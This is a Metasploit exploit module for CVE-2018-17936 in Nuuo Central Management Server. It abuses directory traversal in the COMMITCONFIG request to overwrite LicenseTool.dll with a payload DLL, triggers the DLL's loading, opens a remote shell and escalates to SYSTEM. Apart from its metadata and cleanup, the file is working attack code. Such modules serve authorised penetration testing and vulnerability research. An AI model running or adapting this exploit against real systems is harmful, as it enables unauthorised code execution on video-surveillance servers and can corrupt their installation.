##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
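class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::Nuuo

  # The one file in the CMS installation this module overwrites (and has to
  # put back afterwards, see #on_new_session).
  LICENSE_DLL = 'LicenseTool.dll'.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "Nuuo Central Management Server Authenticated Arbitrary File Upload",
        'Description' => %q{
          The COMMITCONFIG verb is used by a CMS client to upload and modify the configuration of the
          CMS Server.
          The vulnerability is in the "FileName" parameter, which accepts directory traversal (..\..\)
          characters. Therefore, this function can be abused to overwrite any files in the installation
          drive of CMS Server.

          This vulnerability is exploitable in CMS versions up to and including v2.4.

          This module will either use a provided session number (which can be guessed with an auxiliary
          module) or attempt to login using a provided username and password - it will also try the
          default credentials if nothing is provided.

          This module will overwrite the LicenseTool.dll file in the CMS Server installation. If the module
          fails to restore LicenseTool.dll then the installation will be corrupted and NCS Server will
          not execute successfully.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Pedro Ribeiro <[email protected]>' # Vulnerability discovery and Metasploit module
        ],
        'References' => [
          [ 'CVE', '2018-17936' ],
          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02' ],
          [ 'URL', 'https://seclists.org/fulldisclosure/2019/Jan/51' ],
          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/NUUO/nuuo-cms-ownage.txt' ]
        ],
        'Platform' => 'win',
        'Arch' => ARCH_X86,
        'Targets' => [
          [ 'Nuuo Central Management Server <= v2.4.0', {} ],
        ],
        'Privileged' => true,
        'DisclosureDate' => '2018-10-11',
        'DefaultTarget' => 0,
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              stdapi_sys_process_execute
              stdapi_sys_process_get_processes
              stdapi_sys_process_kill
            ]
          }
        },
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          # A failed restore leaves NCS_Server.exe unable to start (see the
          # Description above), and #exploit writes two files into the CMS
          # installation directory (a backup copy plus the payload DLL).
          'Stability' => [SERVICE_RESOURCE_LOSS],
          'SideEffects' => [ARTIFACTS_ON_DISK]
        }
      )
    )

    self.needs_cleanup = true
  end

  # Session hook: by the time this runs the payload DLL has been loaded, so
  # try to put the original LicenseTool.dll back. That is only possible from
  # Meterpreter (kill the server, move the backup over our DLL, restart it);
  # any other session type just gets instructions for doing it by hand.
  #
  # @param client [Msf::Session] the session the payload just opened
  def on_new_session(client)
    unless client.type == 'meterpreter'
      print_error('You are not using meterpreter, so we are unable to restore LicenseTool.dll')
      print_error("To restore it, kill the NCS_Server.exe process and copy <CMS_FOLDER>\\#{@dll} to <CMS_FOLDER>\\LicenseTool.dll")
      print_error('... otherwise the Nuuo CMS installation will be nuked!')
      print_good('Anyway, enjoy your shell!')
      return
    end

    print_warning('Please wait a bit while we clean up')
    client.sys.process.get_processes.each do |proc|
      next unless proc['name'] == 'NCS_Server.exe'

      client.sys.process.kill(proc['pid'])
      # Let the process exit and drop its handle on the DLL before we replace it.
      Rex.sleep(5)
      # NOTE(review): both paths are relative, so this presumes the session's
      # working directory is the CMS folder where the backup was dropped, and
      # the result of the move is not checked - the success message below is
      # printed regardless.
      client.shell_command_token("move /y #{@dll} LicenseTool.dll")
      client.sys.process.execute('NCS_Server.exe')
      print_good('Successfully restored LicenseTool.dll!')
    end

    # elevate privs to system (we're already Admin anyway), and we're done!
    client.run_cmd('getsystem')
    print_good('We should have SYSTEM now, enjoy your shell!')
  end

  # Writes +data+ to +filename+ inside the CMS installation by abusing the
  # directory traversal in COMMITCONFIG's FileName parameter (CVE-2018-17936).
  #
  # @param filename [String] file name, resolved relative to the CMS folder
  # @param data [String] raw bytes to write
  # @return whatever ncs_send_request returns for the COMMITCONFIG request
  #   (callers do not currently inspect it)
  def upload_file(filename, data)
    ncs_send_request({
      'method' => 'COMMITCONFIG',
      # Same "..\..\" prefix that GETCONFIG uses in #exploit to read the DLL;
      # presumably two levels up from the config directory is the CMS folder.
      'file_name' => "..\\..\\#{filename}",
      'user_session' => user_session,
      'data' => data
    })
  end

  # Log in, back up LicenseTool.dll under a random name, overwrite it with the
  # payload DLL, then send a SENDLICFILE request, which (presumably) makes the
  # server load the DLL. Restoration happens in #on_new_session.
  #
  # @raise [Msf::Exploit::Failed] via fail_with on login failure or when the
  #   original DLL cannot be read back (no backup means no way to repair the
  #   installation, so the overwrite is refused)
  def exploit
    connect
    res = ncs_login
    fail_with(Failure::NoAccess, 'Failed to login to Nuuo CMS') unless res

    # Download and upload a backup of LicenseTool.dll, so that we can restore it at post
    # and not nuke the CMS installation.
    @dll = rand_text_alpha(12)
    print_status("Backing up LicenseTool.dll to #{@dll}")

    res = ncs_send_request({
      'method' => 'GETCONFIG',
      'file_name' => "..\\..\\#{LICENSE_DLL}",
      'user_session' => user_session
    })
    dll_data = res ? res.body : nil
    # Refuse the destructive step without a usable backup.
    if dll_data.to_s.empty?
      fail_with(Failure::UnexpectedReply, 'Could not read LicenseTool.dll from the server; refusing to overwrite it without a backup')
    end

    upload_file(@dll, dll_data)

    print_status('Uploading payload...')
    upload_file(LICENSE_DLL, generate_payload_dll)

    # Kept from the original module: gives the server time to finish writing
    # the DLL before it is loaded. NOTE(review): not tuned here.
    print_status('Sleeping 15 seconds...')
    Rex.sleep(15)

    print_status('Sending SENDLICFILE request, shell incoming!')
    # The license file's name and contents are irrelevant; only the request matters.
    ncs_send_request({
      'method' => 'SENDLICFILE',
      'file_name' => "#{rand_text_alpha(3..11)}.lic",
      'user_session' => user_session,
      'data' => rand_text_alpha(50..350)
    })
  end
end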